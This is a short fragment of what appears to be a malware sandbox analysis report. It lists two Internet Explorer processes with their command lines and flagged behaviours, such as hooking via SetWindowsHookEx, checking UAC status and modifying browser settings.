C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2080 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:2564
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2080 CREDAT:82952 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:856
-